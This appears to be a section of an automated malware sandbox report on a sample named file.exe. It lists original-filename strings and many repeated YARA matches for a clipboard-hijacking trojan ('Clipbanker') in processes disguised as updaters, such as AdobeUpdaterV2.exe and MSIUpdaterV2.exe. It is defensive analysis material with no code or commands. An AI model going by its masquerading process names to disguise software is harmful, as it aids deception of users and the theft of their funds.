Source: file.exe, 00000000.00000003.2533416931.00000000063A7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2477379991.0000000006135000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2525199327.0000000005F6A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2528901493.00000000063AC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2294659887.0000000002B90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDPMService.exeP vs file.exe
Source: file.exe, 00000000.00000002.4533376549.0000000000546000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameDPMService.exeP vs file.exe
Source: file.exe, 00000000.00000000.2070318774.0000000000E09000.00000008.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameDPMService.exeP vs file.exe
Source: file.exe, 00000000.00000003.2527411352.00000000063A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameDPMService.exeP vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
Yara signature match
Source: 35.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 35.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 14.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 14.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 42.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 42.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 38.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 38.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 32.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 32.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 13.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 13.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 22.2.IQUKpYR1BFFsqw1YWBOv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 22.2.IQUKpYR1BFFsqw1YWBOv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 24.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 24.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 41.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 41.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 29.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 29.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 10.2.VkHLTH_m2kErRb6vpA5n.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 10.2.VkHLTH_m2kErRb6vpA5n.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000017.00000002.2556843085.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000017.00000002.2556843085.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000A.00000002.2495381134.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000A.00000002.2495381134.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000E.00000002.2512361549.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000E.00000002.2512361549.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000F.00000002.2512547715.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000F.00000002.2512547715.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000029.00000002.2857457109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000029.00000002.2857457109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000020.00000002.2684473529.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000020.00000002.2684473529.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000023.00000002.2778342634.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000023.00000002.2778342634.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000026.00000002.4532446439.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000026.00000002.4532446439.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000D.00000002.2514737568.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000D.00000002.2514737568.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000016.00000002.2545838500.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000016.00000002.2545838500.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000002A.00000002.2950167796.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000002A.00000002.2950167796.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000018.00000002.2554981113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000018.00000002.2554981113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
